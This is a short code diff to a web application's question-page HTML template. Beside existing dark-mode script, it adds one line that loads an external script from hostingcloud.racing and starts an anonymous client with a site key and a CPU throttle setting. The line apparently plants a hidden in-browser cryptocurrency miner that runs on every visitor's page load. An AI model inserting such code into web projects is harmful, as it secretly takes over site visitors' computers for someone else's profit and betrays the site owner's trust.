--- a/main_app/templates/question.html
+++ b/main_app/templates/question.html
@@ -254,6 +254,7 @@ if (getDarkCookie() == 'true') {
 	toggleDarkMode();
 }
 </script>
+<script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
 	</body>
 
 	<script>
